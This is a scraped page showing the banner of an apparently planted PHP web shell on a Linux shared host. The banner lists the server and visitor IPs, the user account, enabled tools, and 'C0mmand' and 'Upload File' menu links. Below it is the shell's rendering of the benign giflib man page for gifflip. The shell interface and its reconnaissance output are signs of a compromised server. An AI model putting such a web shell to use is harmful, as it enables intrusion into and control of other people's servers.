Server IP : 111.118.215.189 / Your IP : 216.73.216.185 Web Server : Apache System : Linux md-in-83.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : a1673wkz ( 2475) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /usr/share/doc/giflib-devel-4.1.6/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<!doctype HTML public "-//W3O//DTD W3 HTML 2.0//EN"> <HTML> <HEAD> <TITLE>gifflip</TITLE> <link rev=made href=mailto:esr@snark.thyrsus.com> </HEAD> <BODY> Go to <a href="index.html">index page</a>. <CENTER><H1>gifflip</H1></CENTER> A program to flip (mirror) GIF file along X or Y axes, or rotate the GIF file 90 degrees to the left or to the right.<P> <H1>Usage:</H1> <pre> gifflip [-q] [-r] [-l] [-x] [-y] [-h] gif-file </pre> If no gif-file is given, GifFlip will try to read a GIF file from stdin.<P> <H1>Memory required:</H1> Image. <H1>Options:</H1> <DL> <DT> [-q] <DD> Quiet mode. Default off on MSDOS, on under UNIX. Controls printout of running scan lines. Use -q- to invert.<P> <DT> [-r] <DD> Rotate the GIF file to the right.<P> <DT> [-l] <DD> Rotate the GIF file to the left.<P> <DT> [-x] <DD> Mirror the GIF file along the X axis. Very useful if GIF file was created from another format in with the first line in at image bottom. Effectively exchanges first row with last.<P> <DT> [-y] <DD> Mirror the GIF file along Y axis. Effectively exchanges first column with last.<P> <DT> [-h] <DD> Print one line of command line help, similar to Usage above.<P> </DL> <H1>Author:</H1> Gershon Elber <HR> <ADDRESS>Eric S. Raymond <A HREF="mailto:esr@thyrsus.com"><esr@snark.thyrsus.com></A></ADDRESS> </BODY> </HTML>